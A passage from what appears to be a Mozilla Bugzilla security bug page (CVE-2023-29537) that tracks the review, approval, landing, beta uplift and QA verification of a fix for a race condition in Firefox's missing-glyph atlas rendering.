  • If not all supported branches, which bug introduced the flaw?: None
  • Do you have backports for the affected branches?: No
  • If not, how different, hard to create, and risky will they be?: Should transplant cleanly AFAICS.
  • How likely is this patch to cause regressions; how much testing does it need?: Low risk, fairly simple refactoring to avoid use of several global variables.
  • Is Android affected?: No
Attachment #9324559 - Flags: sec-approval?

The severity field for this bug is set to S3. However, the bug is flagged with the sec-high keyword.
:jfkthame, could you consider increasing the severity of this security bug?

For more information, please visit auto_nag documentation.

Flags: needinfo?(jfkthame)

For what it is worth, I looked on crash stats and I didn't see any use-after-free crashes that looked similar.

Blocks: 1824200

FTR, I filed bug 1824200 for the data race shown in comments 6 and 11, which is unrelated to the original glyph-atlas issue.

Flags: needinfo?(jfkthame)

The bug is marked as tracked for firefox112 (beta) and tracked for firefox113 (nightly). However, the bug still has low severity.

:bhood, could you please increase the severity for this tracked bug? If you disagree with the tracking decision, please talk with the release managers.

For more information, please visit auto_nag documentation.

Flags: needinfo?(bhood)

Comment on attachment 9324559 [details]
Bug 1823365 - Clean up management of missing-glyph atlas.

Approved to land and uplift.

Attachment #9324559 - Flags: sec-approval? → sec-approval+
Flags: needinfo?(bhood)

Clean up management of missing-glyph atlas. r=lsalzman
https://hg.mozilla.org/integration/autoland/rev/193897194231ee21a6a6c4d926f82884b7463b33
https://hg.mozilla.org/mozilla-central/rev/193897194231

Group: gfx-core-security → core-security-release
Status: ASSIGNED → RESOLVED
Closed: 1 year ago
status-firefox113: affectedfixed
Resolution: --- → FIXED
Target Milestone: --- → 113 Branch

Comment on attachment 9324996 [details]
Bug 1823365 - Clean up management of missing-glyph atlas.

Beta/Release Uplift Approval Request

  • User impact if declined: Potential race/use-after-free/crash when rendering missing-glyph symbols
  • Is this code covered by automated tests?: No
  • Has the fix been verified in Nightly?: Yes
  • Needs manual test from QE?: Yes
  • If yes, steps to reproduce: Repeatedly load the testcase in the bug
  • List of other uplifts needed: None
  • Risk to taking this patch: Low
  • Why is the change risky/not risky? (and alternatives if risky): Just replaces several (racy) globals with an atomically-managed record
  • String changes made/needed: none
  • Is Android affected?: No
Attachment #9324996 - Flags: approval-mozilla-beta?
Flags: qe-verify+

Comment on attachment 9324996 [details]
Bug 1823365 - Clean up management of missing-glyph atlas.

Approved for 112.0b8

Attachment #9324996 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
QA Whiteboard: [qa-triaged]

I'm not able to reproduce this crash using the test case from comment 0, with an affected Nightly asan build (2023-03-20). I've tested on Windows 10 and Ubuntu 18.04 x64.

Looben Yang, could you please help up verifying if the bug is fixed on latest Nightly 113 and Beta 112.0b8?

Flags: needinfo?(lsalzman)

FWIW, I found the original testcase crashed pretty reliably for me on macOS with a normal release build. (But as it's a race condition, it may be unpredictable.)

Flags: needinfo?(lsalzman)

Thanks, Jonathan! It crashed for me as well immediately on macOS 11 with a regular FF 111.0.1 build.

The crash is not reproducing anymore on latest Nightly 113.0a1 and Beta 112.0b9, under macOS 11.

Status: RESOLVED → VERIFIED
status-firefox112: fixedverified
status-firefox113: fixedverified
Flags: qe-verify+
Flags: sec-bounty? → sec-bounty+
Whiteboard: [adv-main112+]
Alias: CVE-2023-29537
Group: core-security-release
Regressions: 1874324
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: